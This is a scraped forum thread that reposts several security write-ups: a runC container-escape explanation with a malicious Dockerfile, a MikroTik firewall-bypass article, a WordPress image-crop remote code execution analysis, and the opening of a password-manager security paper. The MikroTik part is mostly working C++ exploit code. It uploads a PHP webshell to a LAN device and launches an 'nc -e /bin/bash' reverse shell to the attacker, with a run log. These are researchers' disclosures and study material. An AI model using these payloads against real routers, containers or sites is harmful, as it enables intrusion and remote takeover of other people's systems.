For example, by listing the files under /proc/self using ls /proc/self one can see that /proc/self/exe points to the ‘ls’ executable. That makes sense as the one accessing /proc/self is the ‘ls’ process that our shell spawned. The Vulnerability Let’s go over the vulnerability overview given by the runC team: The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. Those two scenarios might seem different, but both require runC to spin up a new process in a container and are implemented similarly. In both cases, runC is tasked with running a user-defined binary in the container. In Docker, this binary is either the image’s entry point when starting a new container, or docker exec’s argument when attaching to an existing container. When this user binary is run, it must already be confined and restricted inside the container, or it can jeopardize the host. In order to accomplish that, runC creates a ‘runC init’ subprocess which places all needed restrictions on itself (such as entering or setting up namespaces) and effectively places itself in the container. Then, the runC init process, now in the container, calls the execve syscall to overwrite itself with the user requested binary. This is the method used by runC both for creating new containers and for attaching a process to an existing container. The researchers who revealed the vulnerability discovered that an attacker can trick runC into executing itself by asking it to run /proc/self/exe, which is a symbolic link to the runC binary on the host. An attacker with root access in the container can then use /proc/[runc-pid]/exe as a reference to the runC binary on the host and overwrite it. Root access in the container is required to perform this attack as the runC binary is owned by root. The next time runC is executed, the attacker will achieve code execution on the host. Since runC is normally run as root (e.g. by the Docker daemon), the attacker will gain root access on the host. Why not runC init? The image above might mislead some to believe the vulnerability (i.e. tricking runC into executing itself) is redundant. That is, why can’t an attacker simply overwrite /proc/[runc-pid]/exe instead? A patch for a similar runC vulnerability, CVE-2016-9962, mitigates this kind of attack. CVE-2016-9962 revealed that the runC init process possessed open file descriptors from the host which could be used by an attacker in the container to traverse the host’s filesystem and thus break out of the container. Part of the patch for this flaw was setting the runc init process as ‘non-dumpable’ before it entering the container. In the context of CVE-2019-5736, the ‘non-dumpable’ flag denies other processes from dereferencing /proc/[pid]/exe, and therefore mitigates overwriting the runC binary through it [1]. Calling execve drops this flag though, and hence the new runC process’ /proc/[runc-pid]/exe is accessible. The Symlink Problem The vulnerability may appear to contradict the way symbolic links are implemented in Linux. Symbolic links simply hold the path to their target. For a runC process, /proc/self/exe should contain something like /usr/sbin/runc. When a symlink is accessed by a process, the kernel uses the path present in the link to find the target under the root of the accessing process. That begs the question – when a process in the container opens the symbolic link to the runC binary, why doesn’t the kernel searches for the runC path inside the container root? The answer is that /proc/[pid]/exe does not follow the normal semantics for symbolic links. Technically this might count as a violation of POSIX, but as I mentioned earlier procfs is a special filesystem. When a process opens /proc/[pid]/exe, there is none of the normal procedure of reading and following the contents of a symlink. Instead, the kernel just gives you access to the open file entry directly. Exploitation Soon after the vulnerability was reported, when no POCs were publicly released yet, I attempted to develop my own POC based on the detailed description of the vulnerability given in the LXC patch addressing it. You can find the complete POC code here. Let’s break down LXC’s description of the vulnerability: when runC attaches to a container the attacker can trick it into executing itself. This could be done by replacing the target binary inside the container with a custom binary pointing back at the runC binary itself. As an example, if the target binary was /bin/bash, this could be replaced with an executable script specifying the interpreter path #!/proc/self/exe The ‘#!’ syntax is called shebang and is used in scripts to specify an interpreter. When the Linux loader encounters the shebang, it runs the interpreter instead of the executable. As seen in the video, the program finally executed by the loader is: interpreter [optional-arg] executable-path When the user runs something like docker exec container-name /bin/bash, the loader will recognize the shebang in the modified bash and execute the interpreter we specified – /proc/self/exe, which is a symlink to the runC binary. We can proceed to overwrite the runC binary from a separate process in the container through /proc/[runc-pid]/exe. The attacker can then proceed to write to the target of /proc/self/exe to try and overwrite the runC binary on the host. However in general, this will not succeed as the kernel will not permit it to be overwritten whilst runC is executing. Basically, we cannot overwrite the runC binary while a process is running it. On the other hand, if the runC process exits, /proc/[runc-pid]/exe will vanish and we will lose the reference to the runC binary. To overcome this, we open /proc/[runc-pid]/exe for reading in our process, which creates a file descriptor at /proc/[our-pid]/fd/3. We then wait for the runC process to exit, and proceed to open /proc/[our-pid]/fd/3 for writing, and overwrite runC. Here is the code for overwrite_runc, shortened for brevity: Let’s see some action! The exploit output shows the steps taken to overwrite runC. You can see that the runC process is running as pid 20054. The video can also be seen here. This method has one setback though – it requires an additional process to run the attacker code. Since containers are started with only one process (i.e. the Docker’s image entry point), this approach couldn’t be used to create a malicious image that will compromise the host when run. Some other POCs you might have seen that implement a similar approach are Frichetten’s and feexd’s. Shared Libraries Approach A different exploitation method is used in the official POC released by runC’s maintainers and is superior to POCs similar to mine since it can be implemented to compromise the host through two separate methods: When a user execs a command into an existing attacker controlled container When a user runs a malicious image We’ll now look into building a malicious image since the previous POC already demonstrated the first scenario. The POC I wrote for this method is heavily based on q3k’s POC, which, to the best of my knowledge, was the first published malicious image POC. You can view the full POC code here. Let’s go over the Dockerfile used to build the malicious image. First, the entry point of the image is set to /proc/self/exe in order to trick runC into executing itself when the image is run. # Create a symbolic link to /proc/self/exe and set it as the image entrypoint RUN set -e -x ;\ ln -s /proc/self/exe /entrypoint ENTRYPOINT [ "/entrypoint" ] RunC is dynamically linked to several shared libraries at run time, which can be listed using the ldd command. When the runC process is executed in the container, those libraries are loaded into the runC process by the dynamic linker. It is possible to substitute one of those libraries with a malicious version, that will overwrite the runC binary upon being loaded into the runC process. Our Dockerfile builds a malicious version of the libseccomp library: # Append the run_at_link function to the libseccomp-2.3.1/src/api.c file and build libseccomp ADD run_at_link.c /root/run_at_link.c RUN set -e -x ;\ cd /root/libseccomp-2.3.1 ;\ cat /root/run_at_link.c >> src/api.c ;\ DEB_BUILD_OPTIONS=nocheck dpkg-buildpackage -b -uc -us ;\ dpkg -i /root/*.deb The Dockerfile appends the content of run_at_link.c one of libsecomp’s source files. Subsequently, the malicious libsecomp is built. The constructor attribute (a GCC-specific syntax) indicates that the run_at_link function is to be executed as an initialization function [2] for libseccomp after the dynamic linker loads the library into the runC process. Since run_at_link will be executed by the runC process, it can access the runC binary at /proc/self/exe. The runC process must exit for the runC binary to be writable though. To enforce the exit, run_at_link calls the execve syscall to execute overwrite_runc. Since execve doesn’t affect the file descriptors open by the process, the same file descriptor trick from the previous POC can be used: The runC process loads the libseccomp library and transfers execution to the run_at_link function. run_at_link opens the runC binary for reading through /proc/self/exe. This creates a file descriptor at /proc/self/fd/${runc_fd_read}. run_at_link calls execve to execute overwrite_runc. The process is no longer running the runC binary, overwrite_runc opens /proc/self/fd/runc_fd_read for writing and overwrites the runC binary. For the following video, I built a malicious image that overwrites the runC binary with a simple script that spawns a reverse shell at port 2345. The docker run command executes runC twice. Once to create and run the container, which executes the POC to overwrite runC, and then again to stop the container using runc delete [3]. The second time runC is executed, it is already overwritten, and hence the reverse shell script is executed instead. The Fix RunC and LXC were both patched using the same approach, which is described clearly in the LXC patch commit: To prevent this attack, LXC has been patched to create a temporary copy of the calling binary itself when it starts or attaches to containers. To do this LXC creates an anonymous, in-memory file using the memfd_create() system call and copies itself into the temporary in-memory file, which is then sealed to prevent further modifications. LXC then executes this sealed, in-memory file instead of the original on-disk binary. Any compromising write operations from a privileged container to the host LXC binary will then write to the temporary in-memory binary and not to the host binary on-disk, preserving the integrity of the host LXC binary. Also as the temporary, in-memory LXC binary is sealed, writes to this will also fail. RunC has been patched using the same method. It re-executes from a temporary copy of itself when it starts or attaches to containers. Consequently, /proc/[runc-pid]/exe now points to the temporary file, and the runC binary can’t be reached from within the container. The temporary file is also sealed to block writing to it, although overwriting it shouldn’t compromise the host. This patch introduced some issues though. The temporary runC copy is created in-memory after the runc init process has already applied the container’s cgroup memory constraints on itself. For containers running with a relatively low memory limit (e.g 10Mb), this can cause processes in the container to be oom-killed (Out Of Memory killed) by the kernel when the runC init process attaches to the container. If you are interested, an issue regarding this complication was created and contains a discussion about alternative fixes that might not introduce the same problem. CVE-2019-5736 and Privileged Containers As a general rule of thumb, privileged containers (of a given container runtime) are less secure then unprivileged containers (of the same runtime). Earlier I stated that the vulnerability affects all Docker containers but only LXC’s privileged containers. So why are Docker unprivileged containers vulnerable while LXC unprivileged containers aren’t? Well, it’s because LXC and Docker define privileged containers differently. In fact, Docker unprivileged containers are considered privileged according to LXC philosophy. Privileged containers are defined as any container where the container uid 0 is mapped to the host's uid 0. The main difference is that LXC runs unprivileged containers in a separate user namespace by default, while Docker doesn’t. User namespaces are a feature of Linux that can be used to separate the container root from the host root. The root inside the container, as well as all other users, are mapped to unprivileged users on the host. In other words, a process can have root access for operations inside the container but is unprivileged for operations outside it. If you would like a more in-depth explanation, I recommend LWN’s namespace series So how does running the container in a user namespace mitigate this vulnerability? The attacker is root inside the container but is mapped to an unprivileged user on the host. Therefore, when the attacker tries to open the host’s runC binary for writing, he is denied by the kernel. You might wonder why Docker doesn’t run containers in a separate user namespace by default. It’s because user namespaces do have some drawbacks in the context of containers, which are a bit out of the scope of this post. If you are interested, Docker and rkt (another container runtime) both list the limitations of running containers in user namespaces. Ending Note I hope this post gave you a bit of insight into the different aspects of this vulnerability. If you are using either runC, Docker, or LXC, don’t forget to update to the patched version. Feel free to reach out with any questions you may have through email or @TwistlockLabs. [1] As a side note, privileged Docker containers (before the new patch) could use the /proc/pid/exe of the runc init process to overwrite the runC binary. To be exact, the specific privileges required are SYS_CAP_PTRACE and disabling AppArmor. [2] For those familiar with Windows DLLs, it resembles DllMain. [3] The container is stopped after overwrite_runc exits, since overwrite_runc was executed as the init process (PID 1) of the container. Yuval Avrahami | Security Researcher Yuval Avrahami is a security researcher at Twistlock, dealing with hacking and securing anything related to containers. Yuval is a veteran of the Israeli Air Force, where he served in the role of a researcher. Sursa: https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/
-
- 1
-
-
MikroTik Firewall & NAT Bypass Exploitation from WAN to LAN Jacob Baines Feb 21 A Design Flaw In Making It Rain with MikroTik, I mentioned an undisclosed vulnerability in RouterOS. The vulnerability, which I assigned CVE-2019–3924, allows a remote, unauthenticated attacker to proxy crafted TCP and UDP requests through the router’s Winbox port. Proxied requests can even bypass the router’s firewall to reach LAN hosts. Mistakes were made The proxying behavior is neat, but, to me, the most interesting aspect is that attackers on the WAN can deliver exploits to (nominally) firewall protected hosts on the LAN. This blog will walk through that attack. If you want to skip right to the, sort of complicated, proof of concept video then here it is: A PoC with a network diagram? Pass. The Setup To demonstrate this vulnerability, I need a victim. I don’t have to look far because I have a NUUO NVRMini2 sitting on my desk due to some previous vulnerability work. This NVR is a classic example of a device that should be hidden behind a firewall and probably segmented away from everything else on your network. Join an IoT Botnet in one easy step! In my test setup, I’ve done just that. The NVRMini2 sits behind a MikroTik hAP router with both NAT and firewall enabled. NVRMini2 should be safe from the attacker at 192.168.1.7 One important thing about this setup is that I opened port 8291 in the router’s firewall to allow Winbox access from the WAN. By default, Winbox is only available on the MikroTik hAP via the LAN. Don’t worry, I’m just simulating real world configurations. The attacker, 192.168.1.7, shouldn’t be able to initiate communication with the victim at 10.0.0.252. The firewall should prevent that. Let’s see how the attacker can get at 10.0.0.252 anyways. Probing to Bypass the Firewall CVE-2019–3924 is the result of the router not enforcing authentication on network discovery probes. Under normal circumstances, The Dude authenticates with the router and uploads the probes over the Winbox port. However, one of the binaries that handles the probes (agent) fails to verify whether the remote user is authenticated. Probes are a fairly simple concept. A probe is a set of variables that tells the router how to talk to a host on a given port. The probe supports up to three requests and responses. Responses are matched against a provided regular expression. The following is the builtin HTTP probe. The HTTP probe sends a HEAD request to port 80 and checks if the response starts with “HTTP/1.” In order to bypass the firewall and talk to the NVRMini2 from 192.168.1.7, the attacker just needs to provide the router with a probe that connects to 10.0.0.252:80. The obvious question is, “How do you determine if a LAN host is an NVRMini2?” The NVRMini2 and the various OEM variations all have very similar landing page titles. Using the title tag, you can construct a probe that detects an NVRMini2. The following is taken from my proof on concept on GitHub. I’ve again used my WinboxMessage implementation. bool find_nvrmini2(Winbox_Session& session, std::string& p_address, boost::uint32_t p_converted_address, boost::uint32_t p_converted_port) { WinboxMessage msg; msg.set_to(104); msg.set_command(1); msg.set_request_id(1); msg.set_reply_expected(true); msg.add_string(7, "GET / HTTP/1.1\r\nHost:" + p_address + "\r\nAccept:*/*\r\n\r\n"); msg.add_string(8, "Network Video Recorder Login</title>"); msg.add_u32(3, p_converted_address); // ip address msg.add_u32(4, p_converted_port); // port session.send(msg); msg.reset(); if (!session.receive(msg)) { std::cerr << "Error receiving a response." << std::endl; return false; } if (msg.has_error()) { std::cerr << msg.get_error_string() << std::endl; return false; } return msg.get_boolean(0xd); } You can see I constructed a probe that sends an HTTP GET request and looks for “Network Video Recorder Login</title>” in the response. The router, 192.168.1.70, will take in this probe and send it to the host I’ve defined in msg.add_u32(3) and msg.add_u32(4). In this case, that would be 10.0.0.252 and 80 respectively. This logic bypasses the normal firewall rules. The following screenshot shows the attacker (192.168.1.7) using the probe against 10.0.0.254 (Ubuntu 18.04) and 10.0.0.252 (NVRMini2). You can see that the attacker can’t even ping these devices. However, by using the router’s Winbox interface the attacker is able to reach the LAN hosts. Discovery of the NVRMini2 on the supposedly unreachable LAN is neat, but I want to go a step further. I want to gain full access to this network. Let’s find a way to exploit the NVRMini2. Crafting an Exploit The biggest issue with probes is the size limit. The requests and response regular expressions can’t exceed a combined 220 bytes. That means any exploit will have to be concise. My NVRMini2 stack buffer overflow is anything but concise. It takes 170 bytes just to overflow the cookie buffer. Not leaving room for much else. But CVE-2018–11523 looks promising. The code CVE-2018–11523 exploits. Yup. CVE-2018–11523 is an unauthenticated file upload vulnerability. An attacker can use it to upload a PHP webshell. The proof of concept on exploit-db is 461 characters. Way too big. However, with a little ingenuity it can be reduced to 212 characters. POST /upload.php HTTP/1.1 Host:a Content-Type:multipart/form-data;boundary=a Content-Length:96 --a Content-Disposition:form-data;name=userfile;filename=a.php <?php system($_GET['a']);?> --a This exploit creates a minimalist PHP webshell at a.php. Translating it into a probe request is fairly trivial. bool upload_webshell(Winbox_Session& session, boost::uint32_t p_converted_address, boost::uint32_t p_converted_port) { WinboxMessage msg; msg.set_to(104); msg.set_command(1); msg.set_request_id(1); msg.set_reply_expected(true); msg.add_string(7, "POST /upload.php HTTP/1.1\r\nHost:a\r\nContent-Type:multipart/form-data;boundary=a\r\nContent-Length:96\r\n\r\n--a\nContent-Disposition:form-data;name=userfile;filename=a.php\n\n<?php system($_GET['a']);?>\n--a\n"); msg.add_string(8, "200 OK"); msg.add_u32(3, p_converted_address); msg.add_u32(4, p_converted_port); session.send(msg); msg.reset(); if (!session.receive(msg)) { std::cerr << "Error receiving a response." << std::endl; return false; } if (msg.has_error()) { std::cerr << msg.get_error_string() << std::endl; return false; } return msg.get_boolean(0xd); } Sending the above probe request through the router to 10.0.0.252:80 should create a basic PHP webshell. Crafting a Reverse Shell At this point you could start blindly executing commands on the NVR using the webshell. But being unable to see responses and constantly having to worry about the probe’s size restriction is annoying. Establishing a reverse shell back to the attacker’s box on 192.168.1.7 is a far more ideal solution. Now, it seems to me that there is little reason for an embedded system to have nc with the -e option. Reason rarely seems to have a role in these types of things though. The NVRMini2 is no exception. Of course, nc -e is available. bool execute_reverse_shell(Winbox_Session& session, boost::uint32_t p_converted_address, boost::uint32_t p_converted_port, std::string& p_reverse_ip, std::string& p_reverse_port) { WinboxMessage msg; msg.set_to(104); msg.set_command(1); msg.set_request_id(1); msg.set_reply_expected(true); msg.add_string(7, "GET /a.php?a=(nc%20" + p_reverse_ip + "%20" + p_reverse_port + "%20-e%20/bin/bash)%26 HTTP/1.1\r\nHost:a\r\n\r\n"); msg.add_string(8, "200 OK"); msg.add_u32(3, p_converted_address); msg.add_u32(4, p_converted_port); session.send(msg); msg.reset(); if (!session.receive(msg)) { std::cerr << "Error receiving a response." << std::endl; return false; } if (msg.has_error()) { std::cerr << msg.get_error_string() << std::endl; return false; } return msg.get_boolean(0xd); } The probe above executes the command “nc 192.168.1.7 1270 -e /bin/bash” via the webshell at a.php. The nc command will connect back to the attacker’s box with a root shell. Putting It All Together I’ve combined the three sections above into a single exploit. The exploit connects to the router, sends a discovery probe to a LAN target, uploads a webshell, and executes a reverse shell back to a WAN host. albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ ./nvr_rev_shell --proxy_ip 192.168.1.70 --proxy_port 8291 --target_ip 10.0.0.252 --target_port 80 --listening_ip 192.168.1.7 --listening_port 1270 [!] Running in exploitation mode [+] Attempting to connect to a MikroTik router at 192.168.1.70:8291 [+] Connected! [+] Looking for a NUUO NVR at 10.0.0.252:80 [+] Found a NUUO NVR! [+] Uploading a webshell [+] Executing a reverse shell to 192.168.1.7:1270 [+] Done! albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ The listener gets the root shell as expected. Conclusion I found this bug while scrambling to write a blog to respond to a Zerodium tweet. I was not actively doing MikroTik research. Honestly, I’m just trying to get ready for BSidesDublin. What are the people actually doing MikroTik research finding? Are they turning their bugs over to MikroTik (for nothing) or are they selling those bugs to Zerodium? Do I have to spell it out for you? Don’t expose Winbox to the internet. Sursa: https://medium.com/tenable-techblog/mikrotik-firewall-nat-bypass-b8d46398bf24
-
When dealing with modern JavaScript applications, many penetration testers approach from an ‘out-side-in’ perspective, this is approach often misses security issues in plain sight. This talk will attempt to demystify common JavaScript issues which should be better understood/identified during security reviews. We will discuss reviewing applications in code-centric manner by utilizing freely available tools to help start identifying security issues through processes such as linting and dependency auditing.
-
When is a vulnerability actually a vulnerability? I can't answer this question easily, and thus we look at a few examples in this video.
-
- 2
-
-
-
WordPress 5.0.0 Remote Code Execution 19 Feb 2019 by Simon Scannell This blog post details how a combination of a Path Traversal and Local File Inclusion vulnerability lead to Remote Code Execution in the WordPress core. The vulnerability remained uncovered in the WordPress core for over 6 years. Impact An attacker who gains access to an account with at least author privileges on a target WordPress site can execute arbitrary PHP code on the underlying server, leading to a full remote takeover. We sent the WordPress security team details about another vulnerability in the WordPress core that can give attackers exactly such access to any WordPress site, which is currently unfixed. Who is affected? The vulnerability explained in this post was rendered non-exploitable by another security patch in versions 4.9.9 and 5.0.1. However, the Path Traversal is still possible and currently unpatched. Any WordPress site with a plugin installed that incorrectly handles Post Meta entries can make exploitation still possible. We have seen plugins with millions of active installations do this mistake in the past during the preparations for our WordPress security month. According to the download page of WordPress, the software is used by over 33%1 of all websites on the internet. Considering that plugins might reintroduce the issue and taking in factors such as outdated sites, the number of affected installations is still in the millions. Technical Analysis Both the Path Traversal and Local File Inclusion vulnerability was automatically detected by our leading SAST solution RIPS within 3 minutes scan time with a click of a button. However, at first sight the bugs looked not exploitable. It turned out that the exploitation of the vulnerabilities is much more complex but possible. Background - WordPress Image Management When an image is uploaded to a WordPress installation, it is first moved to the uploads directory (wp-content/uploads). WordPress will also create an internal reference to the image in the database, to keep track of meta information such as the owner of the image or the time of the upload. This meta information is stored as Post Meta entries in the database. Each of these entries are a key / value pair, assigned to a certain ID. Example Post Meta reference to an uploaded image ‘evil.jpg’ 12345678 MariaDB [wordpress]> SELECT * FROM wp_postmeta WHERE post_ID = 50; +---------+-------------------------+----------------------------+ | post_id | meta_key | meta_value | +---------+-------------------------+----------------------------+ | 50 | _wp_attached_file | evil.jpg | | 50 | _wp_attachment_metadata | a:5:{s:5:"width";i:450 ... | ... +---------+-------------------------+----------------------------+ In this example, the image has been assigned the post_ID 50. If the user wants to use or edit the image with said ID in the future, WordPress will look up the matching _wp_attached_file meta entry and use it’s value in order to find the file in the wp-content/uploads directory. Core issue - Post Meta entries can be overwritten The issue with these Post Meta entries prior to WordPress 4.9.9 and 5.0.1 is that it was possible to modify any entries and set them to arbitrary values. When an image is updated (e.g. it’s description is changed), the edit_post() function is called. This function directly acts on the $_POST array. Arbitrary Post Meta values can be updated. 1 2 3 4 5 6 7 8 910 function edit_post( $post_data = null ) { if ( empty($postarr) ) $postarr = &$_POST; ⋮ if ( ! empty( $postarr['meta_input'] ) ) { foreach ( $postarr['meta_input'] as $field => $value ) { update_post_meta( $post_ID, $field, $value ); } } As can be seen, it is possible to inject arbitrary Post Meta entries. Since no check is made on which entries are modified, an attacker can update the _wp_attached_file meta entry and set it to any value. This does not rename the file in any way, it just changes the file WordPress will look for when trying to edit the image. This will lead to a Path Traversal later. Path Traversal via Modified Post Meta The Path Traversal takes place in the wp_crop_image() function which gets called when a user crops an image. The function takes the ID of an image to crop ($attachment_id) and fetches the corresponding _wp_attached_file Post Meta entry from the database. Remember that due to the flaw in edit_post(), $src_file can be set to anything. Simplified wp_crop_image() function. The actual code is located in wp-admin/includes/image.php 1234 function wp_crop_image( $attachment_id, $src_x, ...) { $src_file = $file = get_post_meta( $attachment_id, '_wp_attached_file' ); ⋮ In the next step, WordPress has to make sure the image actually exists and load it. WordPress has two ways of loading the given image. The first is to simply look for the filename provided by the _wp_attached_file Post Meta entry in the wp-content/uploads directory (line 2 of the next code snippet). If that method fails, WordPress will try to download the image from it’s own server as a fallback. To do so it will generate a download URL consisting of the URL of the wp-content/uploads directory and the filename stored in the _wp_attached_file Post Meta entry (line 6). To give a concrete example: If the value stored in the _wp_attached_file Post Meta entry was evil.jpg, then WordPress would first try to check if the file wp-content/uploads/evil.jpg exists. If not, it would try to download the file from the following URL: https://targetserver.com/wp-content/uploads/evil.jpg. The reason for trying to download the image instead of looking for it locally is for the case that some plugin generates the image on the fly when the URL is visited. Take note here that no sanitization whatsoever is performed here. WordPress will simply concatenate the upload directory and the URL with the $src_file user input. Once WordPress has successfully loaded a valid image via wp_get_image_editor(), it will crop the image. 1 2 3 4 5 6 7 8 9101112 ⋮ if ( ! file_exists( "wp-content/uploads/" . $src_file ) ) { // If the file doesn't exist, attempt a URL fopen on the src link. // This can occur with certain file replication plugins. $uploads = wp_get_upload_dir(); $src = $uploads['baseurl'] . "/" . $src_file; } else { $src = "wp-content/uploads/" . $src_file; } $editor = wp_get_image_editor( $src ); ⋮ The cropped image is then saved back to the filesystem (regardless of whether it was downloaded or not). The resulting filename is going to be the $src_file returned by get_post_meta(), which is under control of an attacker. The only modification made to the resulting filename string is that the basename of the file is prepended by cropped- (line 4 of the next code snippet.) To follow the example of the evil.jpg, the resulting filename would be cropped-evil.jpg. WordPress then creates any directories in the resulting path that do not exist yet via wp_mkdir_p() (line 6). It is then finally written to the filesystem using the save() method of the image editor object. The save() method also performs no Path Traversal checks on the given file name. 12345678 ⋮ $src = $editor->crop( $src_x, $src_y, $src_w, $src_h, $dst_w, $dst_h, $src_abs ); $dst_file = str_replace( basename( $src_file ), 'cropped-' . basename( $src_file ), $src_file ); wp_mkdir_p( dirname( $dst_file ) ); $result = $editor->save( $dst_file ); The idea So far, we have discussed that it is possible to determine which file gets loaded into the image editor, since no sanitization checks are performed. However, the image editor will throw an exception if the file is not a valid image. The first assumption might be, that it is only possible to crop images outside the uploads directory then. However, the circumstance that WordPress tries to download the image if it is not found leads to a Remote Code Execution vulnerability. Local File HTTP Download Uploaded file evil.jpg evil.jpg _wp_attached_file evil.jpg?shell.php evil.jpg?shell.php Resulting file that will be loaded wp-content/uploads/evil.jpg?shell.php https://targetserver.com/wp-content/uploads/evil.jpg?shell.php Actual location wp-content/uploads/evil.jpg https://targetserver.com/wp-content/uploads/evil.jpg Resulting filename None - image loading fails evil.jpg?cropped-shell.php The idea is to set _wp_attached_file to evil.jpg?shell.php, which would lead to a HTTP request being made to the following URL: https://targetserver.com/wp-content/uploads/evil.jpg?shell.php. This request would return a valid image file, since everything after the ? is ignored in this context. The resulting filename would be evil.jpg?shell.php. However, although the save() method of the image editor does not check against Path Traversal attacks, it will append the extension of the mime type of the image being loaded to the resulting filename. In this case, the resulting filename would be evil.jpg?cropped-shell.php.jpg. This renders the newly created file harmless again. However, it is still possible to plant the resulting image into any directory by using a payload such as evil.jpg?/../../evil.jpg. Exploiting the Path Traversal - LFI in Theme directory Each WordPress theme is simply a directory located in the wp-content/themes directory of WordPress and provides template files for different cases. For example, if a visitor of a blog wants to view a blog post, WordPress looks for a post.php file in the directory of the currently active theme. If it finds the template it will include() it. In order to add an extra layer of customization, it is possible to select a custom template for certain posts. To do so, a user has to set the _wp_page_template Post Meta entry in the database to such a custom filename. The only limitation here is that the file to be include()‘ed must be located in the directory of the currently active theme. Usually, this directory cannot be accessed and no files can be uploaded. However, by abusing the above described Path Traversal, it is possible to plant a maliciously crafted image into the directory of the currently used theme. The attacker can then create a new post and abuse the same bug that enabled him to update the _wp_attached_file Post Meta entry in order to include() the image. By injecting PHP code into the image, the attacker then gains arbitrary Remote Code Execution. Crafting a malicious image - GD vs Imagick WordPress supports two image editing extensions for PHP: GD and Imagick. The difference between them is that Imagick does not strip exif metadata of the image, in which PHP code can be stored. GD compresses each image it edits and strips all exif metadata. This is a result of how GD processes images. However, exploitation is still possible by crafting an image that contains crafted pixels that will be flipped in a way that results in PHP code execution once GD is done cropping the image. During our efforts to research the internal structures of PHP’s GD extension, an exploitable memory corruption flaw was discovered in libgd. (CVE-2019-69772). Time Line Date What 2018/10/16 Vulnerability reported to the WordPress security team on Hackerone. 2018/10/18 A WordPress Security Team member acknowledges the report and says they will come back once the report is verified. 2018/10/19 Another WordPress Security Team member asks for more information. 2018/10/22 We provide WordPress with more information and provide a complete, 270 line exploit script to help verify the vulnerability, 2018/11/15 WordPress triages the vulnerability and says they were able to replicate it. 2018/12/06 WordPress 5.0 is released, without a patch for the vulnerability. 2018/12/12 WordPress 5.0.1 is released and is a security update. One of the patches makes the vulnerabilities non exploitable by preventing attackers to set arbitrary post meta entries. However, the Path Traversal is still possible and can be exploited if plugins are installed that incorrectly handle Post Meta entries. WordPress 5.0.1 does not address either the Path Traversal or Local File Inclusion vulnerability. 2018/12/19 WordPress 5.0.2 is released. without a patch for the vulnerability. 2019/01/09 WordPress 5.0.3 is released, without a patch for the vulnerability. 2019/01/28 We ask WordPress for an ETA of the next security release so we can coordinate our blog post schedule and release the blog post after the release. 2019/02/14 WordPress proposes a patch. 2019/02/14 We provide feedback on the patch and verify that it prevents exploitation. Summary This blog post detailed a Remote Code Execution in the WordPress core that was present for over 6 years. It became non-exploitable with a patch for another vulnerability reported by RIPS in versions 5.0.1 and 4.9.9. However, the Path Traversal is still possible and can be exploited if a plugin is installed that still allows overwriting of arbitrary Post Data. Since certain authentication to a target WordPress site is needed for exploitation, we decided to make the vulnerability public after 4 months of initially reporting the vulnerabilities. We would like to thank the volunteers of the WordPress security team which have been very friendly and acted professionally when working with us on this issue. Sursa: https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
-
- 1
-
-
Password Managers: Under the Hood of Secrets Management
Nytro posted a topic in Tutoriale in engleza
Password Managers: Under the Hood of Secrets Management February 19, 2019 Also see associated blog Abstract: Password managers allow the storage and retrieval of sensitive information from an encrypted database. Users rely on them to provide better security guarantees against trivial exfiltration than alternative ways of storing passwords, such as an unsecured flat text file. In this paper we propose security guarantees password managers should offer and examine the underlying workings of five popular password managers targeting the Windows 10 platform: 1Password 7 [1], 1Password 4 [1], Dashlane [2], KeePass [3], and LastPass [4]. We anticipated that password managers would employ basic security best practices, such as scrubbing secrets from memory when they are not in use and sanitization of memory once a password manager was logged out and placed into a locked state. However, we found that in all password managers we examined, trivial secrets extraction was possible from a locked password manager, including the master password in some cases, exposing up to 60 million users that use the password managers in this study to secrets retrieval from an assumed secure locked state. Introduction: First and foremost, password managers are a good thing. All password managers we have examined add value to the security posture of secrets management, and as Troy Hunt, an active security researcher once wrote, “Password managers don’t have to be perfect, they just have to be better than not having one” [5]. Aside from being an administrative tool to allow users to categorize and better manage their credentials, password managers guide users to avoid bad password practices such as using weak passwords, common passwords, generic passwords, and password reuse. The tradeoff is that users’ credentials are then centrally stored and managed, typically protected by a single master password to unlock a password manager data store. With the rising popularity of password manager use it is safe to assume that adversarial activity will target the growing user base of these password managers. Table 1, below, outlines the number of individual users and business entities for each of the password managers we examine in this paper. Password Manager Users Business Entities 1Password 15,000,000 [6] 30,000 [6] Dashlane 10,000,000 [7] 10,000 [7] KeePass 20,000,000 [8] Unknown LastPass 16,500,000 [9] 43,000 [9] Table 1. Number of private users and business entities of 1Password (all versions), Dashlane, KeePass and LastPass. Motivation: With the proliferation of online services, password use has gone from about 25 passwords per user in 2007 [10] to 130 in 2015 and is projected to grow to 207 in 2020 [11]. This, combined with a userbase of 60 million across password managers we examine in this paper, creates a target rich environment in which adversaries can carefully craft methods to extract an increasingly growing and valuable trove of secrets and credentials. An example in which a password manager appears to have been specifically targeted is an attack that led to the loss of 2578 units of Ethereum (ETH), a cryptocurrency valued at the time of 1.5 million USD. The attack was carried out against a cryptocurrency trading assistant platform, Taylor [12]. Taylor issued a statement that indicated a device which was using 1Password for secrets management was compromised [13]. It remains unclear, whether the attacker found a security issue in 1Password itself or simply discovered the master password in some other way, or whether the compromise had nothing to do with password managers. Given the combination of an increasing number of credentials held in password managers, the value of those secrets and the emerging threats specifically targeting password managers it is important for us to examine the increased risk a user or organization faces in terms of secrets exposure when using a password manager. Our approach for this was to survey popular password managers to determine common defenses they employ against secrets exfiltration. We incorporate the best security features of each into a hypothetical, best possible password manager, that provides a minimum set of guarantees outlined in the next section. Then we compare the password managers studied against those security guarantees. Password Manager Security Guarantees: All password managers studied work in the same basic way. Users enter or generate passwords in the software and add any pertinent metadata (e.g., answers to security questions, and the site the password goes to). This information is encrypted and then decrypted only when it is needed for display, for passing to a browser add-on that fills the password into a website, or for copying to the clipboard for use. Throughout this paper we will refer to password managers in three states of existence: not running, unlocked (and running), and locked (and running; this state assumes the password manager was previously unlocked). We assume that the user does not have additional layers of encryption such as full disk encryption or per process virtualization. We define the three states below: Not Running We define “not running” as a state where the password manager has previously been installed, configured, and interacted with by the user to store secrets, but has not been launched since the last reboot or has been terminated by the user since it was last used. In this “not running” state the password manager should guarantee: There should be no data stored on disk that would offer an attacker leverage toward compromising the database stored on disk (e.g. the master password or encryption key stored in a configuration file). Even if an attacker retrieves the password database from disk, it should be encrypted in such a way that an attacker cannot decrypt it without knowing the master password. The 